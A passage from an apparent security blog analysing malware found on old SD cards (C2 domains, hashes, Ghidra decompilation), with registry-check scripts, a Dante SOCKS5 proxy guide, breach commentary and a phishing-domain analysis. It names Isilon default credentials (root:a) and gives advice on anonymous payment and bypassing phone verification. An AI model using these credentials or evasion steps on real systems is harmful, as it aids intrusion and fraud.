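    character). The final loop then skips the run of whitespace, leaving
    pbVar2 at the first argument. The end of the Python string plays the role
    of the NUL terminator."""
    i, n = 0, len(cmdline)
    if n and cmdline[0] == '"':
        i = 1
        while i < n and cmdline[i] != '"':   # do { ++p; if (!*p) break; } while (*p != '"')
            i += 1
        if i < n:                            # found the closing quote: step past it
            i += 1
    else:
        while i < n and ord(cmdline[i]) > 0x20:  # advance until the first byte < 0x21
            i += 1
    while i < n and ord(cmdline[i]) <= 0x20:      # skip whitespace to the first argument
        i += 1
    return cmdline[i:]


# Constructed command lines exercising the quoted, unquoted, argument-less and
# unterminated-quote cases.
SAMPLE_COMMAND_LINES = [
    r'"C:\Users\admin\lzmjqt.exe" /install',
    "kombat.exe   arg1 arg2",
    r'"C:\Program Files\some app\tool.exe"',
    '"unterminated quote',
]

if __name__ == "__main__":
    for cl in SAMPLE_COMMAND_LINES:
        print(repr(cl), "->", repr(skip_program_name(cl)))
```

    Recognising this block on sight saves time: it is boilerplate emitted by the compiler, so the analyst can skip straight to the call that receives its result (FUN_0040dee8 and FUN_004109ec in the two listings), which is where the program’s own code begins.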

    OSINT

    shakira.exe
    a94ccc4af328865384badd276d1f1a4bb38fa83edc006ad275b1f767eaf17c53
    53/64, https://www.virustotal.com/gui/file/a94ccc4af328865384badd276d1f1a4bb38fa83edc006ad275b1f767eaf17c53
    Associated with the Armadillo malware packer.

    xuat.exe
    a94ccc4af328865384badd276d1f1a4bb38fa83edc006ad275b1f767eaf17c53
    Same as/Part of above file.

    slade.safehousenumber[.]com
    9/94, https://www.virustotal.com/gui/domain/slade.safehousenumber.com
    GoDaddy registered domain known for phishing.

    murik.portal-protection.net[.]ru
    3/94, https://www.virustotal.com/gui/domain/murik.portal-protection.net.ru
    Domain registered with Russian registrar RU-CENTER-RU. Known malware domain.

    banana.cocolands[.]su
    5/94, https://www.virustotal.com/gui/domain/banana.cocolands.su
    Registered with NIC.ru domain registrar. Known malware domain.

    portal.roomshowerbord[.]com
    5/94, https://www.virustotal.com/gui/domain/portal.roomshowerbord.com
    Domain registered with GoDaddy. Known malware domain.

    44.221.84[.]105
    1/94, https://www.virustotal.com/gui/ip-address/44.221.84.105/details
    Supposedly an Amazon domestic IP, but associated with malware.

    193.166.255[.]171
    2/94, https://www.virustotal.com/gui/ip-address/193.166.255.171
    Finnish IP serving phishing domains.

    Conclusion

    Definitely similar to naprava.exe. Maybe the same threat actor wrote this malware that I picked up at the internet cafe in Chisinau, Moldova.

    Indicators of Compromise

    AnyRun Link: https://app.any.run/tasks/abdd8821-c4aa-4f97-9d86-4eb5f1983023
    File Path: ..\havesit\shakira.exe
    File Name: shakira.exe
    SHA256: a94ccc4af328865384badd276d1f1a4bb38fa83edc006ad275b1f767eaf17c53
    C2 Domain: slade.safehousenumber[.]com
    C2 Domain: murik.portal-protection.net[.]ru
    C2 Domain: banana.cocolands[.]su
    C2 Domain: portal.roomshowerbord[.]com
    C2 IP: 44.221.84[.]105
    C2 IP: 193.166.255[.]171

  • naprava.exe Analysis

    I served a two year ecclesiastical mission in the Republic of Moldova from 2011 to 2013 for the Church of Jesus Christ of Latter-day Saints. I recently dug through boxes of old memories and found SD cards containing photos and videos from those two years in Moldova.

    However, after inserting them into my Linux machine’s SD card reader, I found one to contain multiple sub-folders with oddly or Russian-named Windows executables. These are not part of the SanDisk default directory structure, nor part of the Canon digital camera software directory structure.

    File Analysis

    ../eksplozivna/naprava.exe

    Analysis

    I uploaded the file to AnyRun: https://app.any.run/tasks/9a5b4267-cc01-40ff-bdef-eff6b1c702a8

    The exe called on svchost.exe and loaded the following dlls:

    • ntdll.dll
    • wow64.dll
    • wow64win.dll
    • wow64cpu.dll
    • kernel32.dll
    • KernelBase.dll
    • apphelp.dll
    • sechost.dll
    • rpcrt4.dll
    • bcrypt.dll
    • ucrtbase.dll

    All dlls are legitimately signed.

    The exe replaces the legitimate svchost with a modified version. It sends a write event to the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon with the value name Shell. This is a big red flag and looks like it is hooking a reverse shell into the logon actions.
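
    The Winlogon Shell value is the persistence mechanism shared by kombat.exe’s lzmjqt.exe, shakira.exe’s xuat.exe and this sample, so it is worth a standing check. The Python below is an added example (not from the post): it evaluates Shell values against the expected explorer.exe default and, on Windows, reads the live HKCU and HKLM values with winreg. The dictionary of sample values is constructed, including the placeholder SID under HKU, and mirrors the explorer.exe,C:\Users\admin\xuat.exe value described for shakira.exe.

```python
import sys

EXPECTED_SHELL = "explorer.exe"
WINLOGON_SUBKEY = r"Software\Microsoft\Windows NT\CurrentVersion\Winlogon"

# Constructed sample values, as a sweep of several hives/users might return
# them. The HKCU value copies the pattern described for xuat.exe; the SID under
# HKU is a placeholder.
SAMPLE_SHELL_VALUES = {
    "HKCU": r"explorer.exe,C:\Users\admin\xuat.exe",
    "HKLM": "explorer.exe",
    "HKU\\S-1-5-21-EXAMPLE-1001": None,   # value not set: the default shell applies
}


def extra_shell_entries(value):
    """Return every command in a Winlogon Shell value other than the default
    explorer.exe. An empty list means the default shell; None (value absent)
    also means the default."""
    if value is None:
        return []
    entries = [e.strip() for e in value.split(",") if e.strip()]
    return [e for e in entries if e.lower() != EXPECTED_SHELL]


def assess_shell_values(values):
    """Given a mapping of hive/user -> Shell value, return (hive, extra_command)
    findings for every non-default entry."""
    findings = []
    for hive, value in values.items():
        for extra in extra_shell_entries(value):
            findings.append((hive, extra))
    return findings


def read_live_shell_values():
    """On Windows, read the HKCU and HKLM Shell values with winreg; elsewhere
    return an empty dict so the constructed sample is evaluated instead."""
    if sys.platform != "win32":
        return {}
    import winreg
    out = {}
    for name, root in (("HKCU", winreg.HKEY_CURRENT_USER), ("HKLM", winreg.HKEY_LOCAL_MACHINE)):
        try:
            with winreg.OpenKey(root, WINLOGON_SUBKEY) as key:
                out[name], _ = winreg.QueryValueEx(key, "Shell")
        except FileNotFoundError:
            out[name] = None   # key or value missing: default shell
    return out


if __name__ == "__main__":
    values = read_live_shell_values() or SAMPLE_SHELL_VALUES
    for hive, extra in assess_shell_values(values):
        print(f"[!] {hive}\\...\\Winlogon\\Shell launches extra command: {extra}")
```

    Because the value is a comma-separated list, the malware keeps explorer.exe in place so the desktop still appears; a check that only compares the whole string against explorer.exe would miss it, which is why the function splits the list and reports each extra entry.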

    The program then uses the malicious svchost process to drop another file: cbzvl.exe

    The program uses the WinAPI to query for system information. Then it creates a UDP connection to 45.144.3[.]149:6600 (peer.pickeklosarske[.]ru).

    The connection sends 21 bytes. Nothing decipherable in the pcap.

    Another UDP connection is made to 193.166.255[.]171:6600 (teske.pornicarke[.]com) to send another 21 bytes. Additional 21-byte outbound UDP packets are also present.

    Below is the hash analysis of the files:

    AnyRun shows the session also reached out to the following IP addresses:

    Ghidra analysis of the malware shows the following decompiled code:

    void entry(void)
    
    {
      int in_EAX;
      DWORD DVar1;
      size_t sVar2;
      LPSYSTEMTIME p_Var3;
      int iVar4;
      BOOL BVar5;
      uint uVar6;
      UINT UVar7;
      char extraout_CL;
      ushort extraout_CX;
      short extraout_CX_00;
      undefined4 extraout_ECX;
      uint extraout_ECX_00;
      undefined extraout_DL;
      uint extraout_EDX;
      undefined4 extraout_EDX_00;
      undefined4 extraout_EDX_01;
      uint extraout_EDX_02;
      char *extraout_EDX_03;
      uint extraout_EDX_04;
      int extraout_EDX_05;
      uint extraout_EDX_06;
      uint extraout_EDX_07;
      char *extraout_EDX_08;
      char *extraout_EDX_09;
      uint extraout_EDX_10;
      byte bVar8;
      ushort uVar9;
      uint unaff_EBX;
      ushort uVar10;
      uint unaff_ESI;
      LPSYSTEMTIME p_Var11;
      uint uVar12;
      uint unaff_EDI;
      undefined4 uVar13;
      char cVar14;
      bool bVar15;
      char *pcVar16;
      char *pcVar17;
      char *pcVar18;
      uint local_78;
      LARGE_INTEGER local_70;
      _SYSTEMTIME local_68;
      uint local_58;
      char *local_54;
      uint local_50;
      _SYSTEMTIME local_4c;
      uint local_3c;
      _SYSTEMTIME local_38;
      undefined2 local_28;
      ushort local_24;
      _SYSTEMTIME local_20;
      char *local_10;
      byte local_c;
      byte local_b;
      char local_a;
      undefined local_9;
      LPSYSTEMTIME local_8;
      
      local_8 = (LPSYSTEMTIME)0xfff5abd4;
      if (in_EAX != -0x6f40b600) {
        GetStartupInfoA((LPSTARTUPINFOA)&DAT_0040a014);
        unaff_EBX = CONCAT22((short)(unaff_EBX >> 0x10),CONCAT11(local_c,(char)unaff_EBX));
        DAT_0040a0cc = unaff_EDI;
      }
      GetSystemTime(&SYSTEMTIME_0040a0d0);
      strlen("Rscmc Clf, Nqf. Gau");
      DAT_0040a058 = (undefined2)unaff_EBX;
      uVar12 = DAT_0040a0e0;
      GetSystemTime((LPSYSTEMTIME)&DAT_0040a080);
      if (DAT_0040a0cc != unaff_ESI) {
        local_8 = (LPSYSTEMTIME)((int)local_8 + uVar12);
      }
      p_Var11 = (LPSYSTEMTIME)(unaff_ESI & (uint)local_8);
      local_8 = (LPSYSTEMTIME)0x114060;
      DVar1 = GetTickCount();
      if (DVar1 != 0) {
        unaff_EBX = (uint)(char)(unaff_EBX >> 8);
        local_10 = (char *)0x0;
        DAT_0040a05a = extraout_CX;
      }
      cVar14 = local_8 < DVar1;
      local_8 = (LPSYSTEMTIME)((int)local_8 - DVar1);
      uVar13 = CONCAT22((short)(unaff_EDI >> 0x10),DAT_0040a0e4);
      GetStartupInfoA((LPSTARTUPINFOA)&DAT_0040a014);
      GetSystemTime(&local_20);
      local_b = (byte)(unaff_EBX >> 8);
      DAT_0040a0c7 = (DAT_0040a0c7 - extraout_CL) - cVar14;
      DAT_0040a008 = puts("Mojjha Phdr. Ygpa");
      _DAT_0040a0e8 = _DAT_0040a0e8 + -0xbe9620;
      DAT_0040a000 = 0;
      puts("Fbwdc Ymrwoelrx");
      GetOEMCP();
      DAT_0040a008 = uVar13;
      strlen("Oyycv La, Jjpfwl");
      DAT_0040a0e0 = DAT_0040a0e0 | extraout_EDX;
      pcVar16 = "Lpdm, Rgcmnbe Wmslc";
      sVar2 = strlen("Lpdm, Rgcmnbe Wmslc");
      if (((LPSYSTEMTIME)local_10 == p_Var11) &&
         (unaff_EBX = unaff_EBX + (-(uint)(local_10 < p_Var11) - sVar2),
         ((uint)pcVar16 & (uint)p_Var11) == 0)) {
        local_10 = (char *)unaff_EBX;
      }
      sVar2 = strlen("Qlmqipqh Gaxmdj Qwl");
      local_8 = (LPSYSTEMTIME)((uint)local_8 | 0x244);
      _DAT_0040a0e8 = extraout_EDX_00;
      if ((short)sVar2 != DAT_0040a0e6) {
        p_Var3 = &local_20;
        GetSystemTime(p_Var3);
        if (p_Var3 == (LPSYSTEMTIME)0x0) {
          unaff_EBX = unaff_EBX & 0xffff0000;
          _DAT_0040a0ec = extraout_ECX;
        }
        unaff_EBX = CONCAT22((short)(unaff_EBX >> 0x10),local_28);
      }
      GetSystemTime(&local_38);
      p_Var3 = &local_4c;
      local_3c = (uint)p_Var11;
      GetSystemTime(p_Var3);
      if ((DAT_0040a0c2 == (short)p_Var3) &&
         (p_Var11 = local_8, _DAT_0040a0f4 = extraout_EDX_01, ((uint)p_Var3 & 0xaafae336) == 0)) {
        DAT_0040a00d = DAT_0040a00d + -0x10;
        p_Var3 = DAT_0040a0c8;
        unaff_EBX = DAT_0040a0f0;
      }
      DAT_0040a0cc = extraout_ECX_00;
      local_8 = p_Var3;
      iVar4 = puts("Cjkh Kpgoft Mrl");
      if (iVar4 == 0) {
        local_10 = (char *)0x0;
        DAT_0040a074 = 0xffffffff;
      }
      DAT_0040a0f8 = DAT_0040a0f8 ^ 0xffff;
      pcVar16 = (char *)CONCAT31((int3)(unaff_EBX >> 8),DAT_0040a00e);
      strlen("Enoutwjs Mngef Ybwg");
      DAT_0040a060 = (char *)0x1d0;
      local_10 = (char *)((uint)local_10 & extraout_EDX_02);
      strlen("Jrkxwqmylr, Tetmf");
      pcVar17 = "Ixjyep. Ths, Tcfbe";
      strlen("Ixjyep. Ths, Tcfbe");
      local_54 = pcVar17;
      local_24 = FUN_00408ce9(pcVar17,extraout_DL);
      pcVar17 = local_10;
      DAT_0040a0fc = 0;
      if ((char)local_24 == 'P') {
        BVar5 = QueryPerformanceCounter((LARGE_INTEGER *)&DAT_0040a090);
        local_24 = (ushort)BVar5;
        _DAT_0040a100 = 0x2c3468;
        pcVar16 = (char *)~(uint)pcVar16;
        GetSystemTime((LPSYSTEMTIME)&DAT_0040a080);
      }
      local_3c = (uint)p_Var11;
      GetStartupInfoA((LPSTARTUPINFOA)&DAT_0040a014);
      local_b = 0;
      puts("Homaqmdy Rup Ox");
      iVar4 = puts("Crbw, Kcfsu, Qsqy");
      if ((iVar4 != 0) && (DAT_0040a05a = DAT_0040a05a & (ushort)pcVar16, (int)local_8 <= (int)p_Var11))
      {
        local_a = -1;
      }
      strlen("Sjrk. Yg. Wgkqfp");
      local_50 = 0;
      iVar4 = puts("Gdhthyy Ygcp Gobqc");
      if (local_a == (char)iVar4) {
        bVar15 = CARRY4((uint)p_Var11,(uint)pcVar17);
        p_Var11 = (LPSYSTEMTIME)((int)p_Var11 + (int)pcVar17);
        pcVar16 = extraout_EDX_03 + (uint)bVar15 + CONCAT31((int3)((uint)pcVar16 >> 8),local_c);
        local_58 = 0;
        if (pcVar17 == extraout_EDX_03) {
          _DAT_0040a0bc = 0x2d2be4;
        }
      }
      local_50 = 0x39614c;
      p_Var3 = &local_68;
      GetSystemTime(p_Var3);
      if (p_Var3 == (LPSYSTEMTIME)0x0) {
        DAT_0040a0c8 = (LPSYSTEMTIME)0x26c;
        local_54 = pcVar17;
        local_24 = (ushort)pcVar16;
      }
      _DAT_0040a104 = pcVar17;
      pcVar18 = "Brlptjuj. Lpiul";
      strlen("Brlptjuj. Lpiul");
      local_8 = (LPSYSTEMTIME)((int)local_8 - (int)pcVar18);
      FUN_00407736("Mpspyof. Q");
      GetStartupInfoA((LPSTARTUPINFOA)&DAT_0040a108);
      GetTickCount();
      if (local_b != (byte)pcVar16) {
        _DAT_0040a0fa = 0xe8;
        local_8 = (LPSYSTEMTIME)(((int)local_8 - extraout_EDX_04) - (uint)(local_b < (byte)pcVar16));
        DAT_0040a0e0 = extraout_EDX_04;
      }
      local_c = 0x2c;
      if ((char)((uint)pcVar16 >> 8) == ',') {
        puts("Qqrlmn. Rfyag, Gur");
      }
      local_8 = (LPSYSTEMTIME)((int)local_8 + 0x33714c);
      local_50 = local_50 - 0xc4faa0;
      _DAT_0040a14c = _DAT_0040a14c & (ushort)local_58;
      DAT_0040a074 = 0;
      strlen("Jnywjsxv Ycr Twdygo");
      QueryPerformanceCounter(&local_70);
      FUN_00407736(s_Peys,_Fk,_Xjffdr_0040a158);
      iVar4 = puts("Yyhlxc, Tqoa Tekwhr");
      if (iVar4 != DAT_0040a0a4) {
        puts("Yupo Rpi Pjvlt, Nxo");
        pcVar16 = DAT_0040a060;
      }
      local_50 = local_50 & 0x1517a4;
      GetTickCount();
      uVar10 = local_24;
      local_58 = local_58 - 0xdd5f30;
      DAT_0040a0fe = 1;
      uVar12 = CONCAT22((short)((uint)p_Var11 >> 0x10),local_24);
      cVar14 = '\x15';
      DAT_0040a0c8 = (LPSYSTEMTIME)pcVar16;
      uVar6 = puts("Etixxpcu Xua, Rcm");
      if ((uVar6 != 0) && ((_DAT_0040a16c & uVar6) != 0)) {
        _DAT_0040a14e = 0xe7f4;
        local_58 = (uint)pcVar17 >> 0x18 | ((uint)pcVar17 & 0xff0000) >> 8 |
                   ((uint)pcVar17 & 0xff00) << 8 | (int)pcVar17 << 0x18;
      }
      strlen("Krcjo, Ldtvhs Tcb");
      puts("Jcjia Ewn, Qlhpq");
      if (DAT_0040a170 == extraout_EDX_05) {
        local_54 = pcVar16;
      }
      local_8 = (LPSYSTEMTIME)((int)local_8 + 0x96a3c0);
      bVar8 = 0x60;
      strlen("Xfhdu Nufd, Ajnx");
      p_Var11 = local_8;
      bVar15 = DAT_0040a0c6 < bVar8;
      if (DAT_0040a0c6 == bVar8) {
        bVar15 = 0xfffffe2f < local_58;
        local_58 = local_58 + 0x1d0;
        local_50 = (local_50 - 1) - (uint)bVar15;
        DAT_0040a0e4 = 0xbae0;
        local_24 = (ushort)cVar14;
        bVar15 = local_24 < (ushort)pcVar16;
        if (local_24 == (ushort)pcVar16) {
          bVar15 = false;
        }
      }
      DAT_0040a0ff = DAT_0040a0ff + -0x70 + bVar15;
      uVar6 = FUN_004078aa();
      if (p_Var11 == (LPSYSTEMTIME)uVar6) {
        strlen("Pjprvc Kbc. Pacgex");
      }
      puts("Wetujnfoun Epgj");
      sVar2 = strlen("Ckp, Tvbv Woqkrvgy");
      if (DAT_0040a074 == extraout_EDX_06) {
        local_58 = (local_58 - 0x3a2b10) - (uint)(DAT_0040a074 < extraout_EDX_06);
        local_24 = 1;
        if (sVar2 != 0x9c6cb36d) {
          local_a = -0x50;
        }
      }
      local_54 = (char *)((uint)local_54 | 0x3c8);
      _DAT_0040a0a8 = 0xa91030;
      GetACP();
      DAT_0040a174 = local_78;
      UVar7 = GetOEMCP();
      if ((DAT_0040a0c2 != extraout_CX_00) && ((UVar7 & 0xa3c0b358) == 0)) {
        p_Var11 = (LPSYSTEMTIME)(extraout_EDX_07 >> 8 & 0xff);
      }
      DAT_0040a178 = uVar12;
      iVar4 = puts("Rwvbvtfp. Sdcdt");
      if (iVar4 == 0) {
        local_78 = -local_78;
        _DAT_0040a17c = SUB42(p_Var11,0);
      }
      local_24 = (ushort)local_78;
      GetSystemTime(&local_38);
      FUN_00407736(s_Wxml._Gyak_0040a180);
      bVar8 = (byte)p_Var11;
      uVar9 = CONCAT11(local_a,bVar8);
      pcVar16 = extraout_EDX_08;
      if ((uVar9 != uVar10) &&
         (sVar2 = strlen("Hykkl Cah. Lhk. Kt"), pcVar16 = extraout_EDX_09, sVar2 == 0)) {
        DAT_0040a18c = DAT_0040a18c + -1;
        pcVar16 = local_10;
      }
      uVar12 = ~uVar12;
      local_10 = pcVar16;
      puts("Vdqejy Eeqgd Yleorx");
      local_a = '\x01';
      _DAT_0040a010 = local_78;
      local_8 = (LPSYSTEMTIME)CONCAT22((short)((uint)p_Var11 >> 0x10),uVar9);
      GetOEMCP();
      cVar14 = bVar8 + (char)DAT_0040a074 + (local_c < bVar8);
      QueryPerformanceCounter(&local_70);
      _DAT_0040a17e = 1;
      pcVar16 = "Lwilrw. Smxq, Mtg";
      puts("Lwilrw. Smxq, Mtg");
      bVar15 = DAT_0040a0e0 < local_78;
      if (DAT_0040a0e0 != local_78) {
        DAT_0040a0cc = extraout_EDX_10 & (uint)DAT_0040a060;
        cVar14 = (char)local_54;
        bVar15 = local_10 != (char *)0xffffffff;
        if (!bVar15) {
          DAT_0040a0cc = 0x68f130;
          cVar14 = '\0';
        }
        pcVar16 = (char *)~(uint)pcVar16;
      }
      local_10 = local_10 + (-(uint)bVar15 - (int)pcVar16);
      sVar2 = strlen("Kbwxyj Csqacui. Stp");
      uVar6 = uVar12;
      if (sVar2 == 0) {
        cVar14 = (char)local_58;
        uVar6 = uVar12 - local_58;
      }
      uVar10 = (ushort)uVar6;
      cVar14 = (cVar14 - (char)local_10) - (sVar2 == 0 && uVar12 < local_58);
      local_10 = (char *)0xdaea4;
      puts("Myvilee, Gvixwh A");
      GetTickCount();
      local_3c = 0xffffffff;
      pcVar16 = "Dyfd, Yannldh Toklr";
      strlen("Dyfd, Yannldh Toklr");
      FUN_00408800((uint)pcVar16);
      bVar8 = 0x34;
      iVar4 = puts("Nspexe Yueomh Lh");
      if (local_b == bVar8) {
        cVar14 = (char)iVar4;
      }
      if (SBORROW4(local_50,0x3b4)) {
        puts("Ydtiyt Rj, Jxkg Tmr");
      }
      DAT_0040a05a = DAT_0040a05a & 0x3430;
      GetStartupInfoA((LPSTARTUPINFOA)&DAT_0040a108);
      bVar8 = (byte)DAT_0040a190;
      DAT_0040a0c5 = cVar14;
      UVar7 = GetOEMCP();
      if (UVar7 != 0) {
        if ((UVar7 & 0x40) == 0) {
          uVar10 = (ushort)DAT_0040a194;
          local_9 = (undefined)(UVar7 >> 8);
        }
        bVar8 = bVar8 & (byte)local_3c;
      }
      puts("Tfqg Hafugk, Njltyh");
      pcVar16 = "Vbix Iowmwtocmr X";
      puts("Vbix Iowmwtocmr X");
      if (local_24 == uVar10) {
        pcVar16 = (char *)CONCAT22((short)((uint)pcVar16 >> 0x10),
                                   CONCAT11(((char)((uint)pcVar16 >> 8) - bVar8) - (local_24 < uVar10),
                                            (char)pcVar16));
      }
      DAT_0040a078 = &DAT_00414570 + (uint)(local_24 != uVar10 && local_24 < uVar10) + (int)DAT_0040a078
      ;
      DAT_0040a0c4 = DAT_0040a0c4 + ' ';
      local_54 = pcVar16;
      GetACP();
      GetSystemTime((LPSYSTEMTIME)&DAT_0040a19c);
      DAT_0040a05a = DAT_0040a05a - 1;
      FUN_00408f23();
                        /* WARNING: Subroutine does not return */
      ExitProcess(0);
    }

    Conclusion

    The malware naprava.exe gathers system information, drops a reverse shell in the WinLogon registry, and then sends info to C2 servers.

  • Dante SOCKS5 Proxy for Reconnaissance

    You are a threat hunter and need to perform some recon on an adversarial foreign APT. However, you do not want to use a common VPN service to get a foreign IP, since those are easily detected and blocked by foreign ISP router rules.

    Solution? Personal Dante SOCKS5 proxy server set up on a VPS with a GeoIP located in your target nation.

    Choose a VPS Service

    First, you need to find a company that provides a VPS with an IP address geolocated in your target country. In this example, I’m going to choose Russia.

    Use the following Google dork: site:"*.by" russia vps

    This allows me to find companies in Belarus that offer Russian IP VPS. You can try searching for “*.ru” but with the sanctions, you will be unable to pay for the server with your American CC. But if you also need to stay anonymous, I would recommend using Monero (XMR) cryptocurrency. How do you get some? Coinbase > buy bitcoin > download Cake Wallet > transfer btc from Coinbase to Cake wallet address > Open Cake Wallet app and swap bitcoin for monero. Now you can find a native Russian VPS service that allows rentals with XMR.

    However, I’ve noticed that all Russian VPS companies require working Russian contact info — namely, a phone number and/or email address. To do this, use OnlineSIM to get an SMS verification code for an email address sign-up with Yandex/RuMail.

    Install & Configure Dante

    I usually install dante on a barebones Debian VPS. Low footprint but still gives me the apt package manager natively.

    $ sudo apt update
    $ sudo apt install dante-server

    Verify dante is installed:

    $ systemctl status danted.service

    Most likely it’s disabled. Make sure to enable the service.

    $ sudo systemctl enable danted.service

    Now let’s edit the config file. I usually keep it barebones:

    logoutput: syslog
    user.privileged: root
    user.unprivileged: nobody
    
    # The listening network interface or address.
    internal: 0.0.0.0 port=1080
    
    # The proxying network interface or address.
    external: eth0
    
    # socks-rules determine what is proxied through the external interface.
    socksmethod: username
    
    # client-rules determine who can connect to the internal interface.
    clientmethod: none
    
    client pass {
        from: 0.0.0.0/0 to: 0.0.0.0/0
    }
    
    socks pass {
        from: 0.0.0.0/0 to: 0.0.0.0/0
    }

    If you want to allow only your home computer to connect to the proxy, then specify your IP address in the from: option of the client pass rule.

    The socksmethod option determines the authentication method for when a client connects to the proxy. username refers to a username/password authentication method. Set clientmethod to none so you don’t have to authenticate again on the internal interface during the proxy connection setup process.

    REMEMBER!!! Change the external: option to the interface of your VPS — it could be eth0 or ens3 or enp0s25, etc.

    Now restart dante.

    $ sudo systemctl restart danted.service
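    Before restarting, a quick sanity check catches the two mistakes the post calls out: an external: interface name that does not exist on the VPS, and a client pass rule open to the whole internet. The script below is an added example, not part of the original post or of Dante itself; the interface names lo/ens3 and the address 203.0.113.7/32 are constructed placeholders.

```shell
#!/bin/sh
# Added example (not part of the original post): sanity-check a danted.conf for the
# two pitfalls the post warns about before restarting the service.
#   1. "external:" must name an interface that really exists on the VPS
#   2. "client pass { from: ... }" of 0.0.0.0/0 lets the whole internet reach port 1080
# Usage: check_danted_conf /etc/danted.conf ["iface1 iface2 ..."]
# The interface list defaults to what /sys/class/net reports on the host.

# Print the interface named by "external:" (empty if the line is missing).
conf_external_iface() {
    sed -n 's/^[[:space:]]*external:[[:space:]]*\([^[:space:]]*\).*/\1/p' "$1" | head -n 1
}

# Print the "from:" value of the client pass rule (empty if missing).
conf_client_from() {
    # The rule spans several lines, so first isolate the "client pass { ... }" block.
    sed -n '/^[[:space:]]*client[[:space:]]*pass[[:space:]]*{/,/}/p' "$1" \
        | sed -n 's/.*from:[[:space:]]*\([^[:space:]]*\).*/\1/p' | head -n 1
}

# Returns 0 when both checks pass, 1 otherwise; findings are printed to stdout.
check_danted_conf() {
    conf="$1"
    ifaces="${2:-$(ls /sys/class/net 2>/dev/null | tr '\n' ' ')}"
    rc=0

    ext=$(conf_external_iface "$conf")
    found=0
    for i in $ifaces; do
        [ "$i" = "$ext" ] && found=1
    done
    if [ -z "$ext" ]; then
        echo "FAIL: no external: line in $conf"
        rc=1
    elif [ "$found" -eq 0 ]; then
        echo "FAIL: external: $ext is not an interface on this host (have: $ifaces)"
        rc=1
    fi

    src=$(conf_client_from "$conf")
    if [ -z "$src" ] || [ "$src" = "0.0.0.0/0" ]; then
        echo "WARN: client pass from: ${src:-missing} allows anyone to connect; use your own IP, e.g. 203.0.113.7/32"
        rc=1
    fi
    return $rc
}

# Constructed sample: the post's open config, on a host whose interfaces are lo and ens3.
sample=$(mktemp)
cat > "$sample" <<'EOF'
internal: 0.0.0.0 port=1080
external: eth0
socksmethod: username
clientmethod: none
client pass {
    from: 0.0.0.0/0 to: 0.0.0.0/0
}
EOF
check_danted_conf "$sample" "lo ens3" || echo "fix $sample before running: sudo systemctl restart danted.service"
rm -f "$sample"
```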

    Connect to Proxy

    Test the proxy using curl on your personal device.

    $ curl -v -x socks5://your_dante_user:your_dante_password@your_server_ip:1080 http://www.google.com/

    Output will tell you if you’ve successfully connected to the page.

    I use the Dante proxy in Firefox Proxy Containers. Install the Container Proxy plugin and configure a proxy with the auth username/password and make sure it is using the SOCKS5 protocol (SOCKS5 can also be used in proxychains — maybe that’ll be a different post). Now assign that proxy to a container tab.

    Open a new tab with that proxy and verify you can reach websites. I would also check the IP address on a public GeoIP checker.

  • Western Sydney University Breach

    The University’s IT team reported the breach this month. The final target of the hackers’ actions: student and faculty data found in Office 365 and an Isilon database of documents. However, no public statement yet as to who did it or really why. I feel like it could’ve been a disgruntled student aiming to get info on another student or even teacher. But let’s look at basic issues that probably plague most public universities.

    Office 365 MFA

    Since 2019, Microsoft has been rolling out Security Defaults for individual and enterprise 365 solutions. Security Defaults include a pre-enabled MFA setting for all users in a new tenant when it is set up.

    This is great news for anyone signing up for a random personal Office 365 subscription or for a brand new business starting out. However, it is safe to say that most universities have been around a lot longer than 5 years.

    This means MFA was most likely not enabled by default for Western Sydney University students and faculty. Even though it is possible that their IT team could have implemented MFA, I don’t see this security measure (no matter how important) to be the number one priority for a school. The IT department is probably swamped with provisioning new devices for new students each year and replacing broken tech as the year goes on.

    Thus, in this hack the most probable and simplest point of entry was a set of compromised credentials or weak passwords — since university email address patterns are public knowledge, usernames are easy to guess.

    Isilon Storage

    Isilon may sound like a fancy cloud solution but it is nothing more than a NAS device. It operates in a storage cluster using FreeBSD. This means it provides access via the HTTP, SMB, NFS, and FTP protocols.

    And as any good script kiddie will do (such as myself), one will search and find the default admin credentials for Isilon devices. Turns out it is root:a. That’s it. root for the username and a for the password.

    Now I’m really hoping the storage admins did not keep this default credential set. But, even if it was changed, Isilon provides LDAP/AD authentication. So, if the hacker already breached 365 with working credentials, he could have easily accessed the file storage, as well.

    Solutions

    The answers are always simple. And in this case, it is no different.

    Enable MFA and change default credentials. Yes, it will be annoying and cumbersome to set it up for hundreds or thousands of students and faculty, but it will save you your job later on. School systems are great places for SSNs, financial account numbers, passports, immigration documents, and even PHI. Nobody wants to deal with that mess.

    To enable security defaults:

    1. Sign in to the Microsoft Entra admin center as at least a Conditional Access Administrator.
    2. Browse to Identity > Overview > Properties.
    3. Select Manage security defaults.
    4. Set Security defaults to Enabled.
    5. Select Save.

    Lastly, change your NFS/SMB shares’ default credentials. Also, remember that if you use LDAP/AD for authentication to the share, you may lose out on MFA tokens. I don’t know how Isilon handles this, so that’s always a concern.

  • Gold Check X Account Takeover

    Scams coming from verified accounts on various platforms are nothing new under the sun. But it’s another level when, on X, instead of compromising a blue checkmarked individual’s account, hackers or scammers compromise a gold checkmarked account belonging to a high profile business or organization. Imagine being contacted by such an account — which is exactly what happened recently to another X user.

    I am unsure what the original account was, but compromising a gold check account and renaming it to X Helps is something I feel a lot of people will fall for.

    The message to @DonutOperator contains a phishing link to hxxp://journey-x-annoying[.]com/case. Let’s start analysis and see if we can take this down.

    Analysis

    VirusTotal gives a 6/94 community score: https://www.virustotal.com/gui/domain/journey-x-annoying.com

    WHOIS lookup in the VT Details tab shows that the domain was created and registered yesterday on 19 January via Tucows Domain Registration.

    URLScan shows the URL leads to an X “Copyright Infrigement” so-called alert:

    But as with 90% of all phishing attempts, the tell is in the details. Most scammers and hackers are foreign and can never get English grammar or spelling right. You’d think they’d be smart enough to just use an online spell check. Or even an AI generated paragraph. Also, they utilize the urgency tactic to rush a naive user into submitting a form right away:

    Copyright infringement [is] detected in your account. If you think [the] copyright infringement is incorrect(?), you should provide feedback on the form. If you can’t give feedback, [y]our account will be permanently deleted from our servers within 24 hours!

    URLScan shows no malicious redirects. VirusTotal shows that it is served by 104.21.52.83 and 172.67.197.67. These are both Cloudflare servers.

    I threw the URL into Any.run sandbox app and found that clicking the Next button on the initial splash page doesn’t bring down any malicious code. Just an X login page: https://app.any.run/tasks/e8fc7414-1e99-4b19-8887-3fac567cb356

    Lastly, I did run dirbuster from a Kali instance in order to find additional web server directories hiding on that domain — but I found nothing. All requests resulted in 404 HTTP status codes. Granted, the domain hasn’t been alive for long and maybe can still be used for additional staging or malware hosting in the future.

    Conclusion

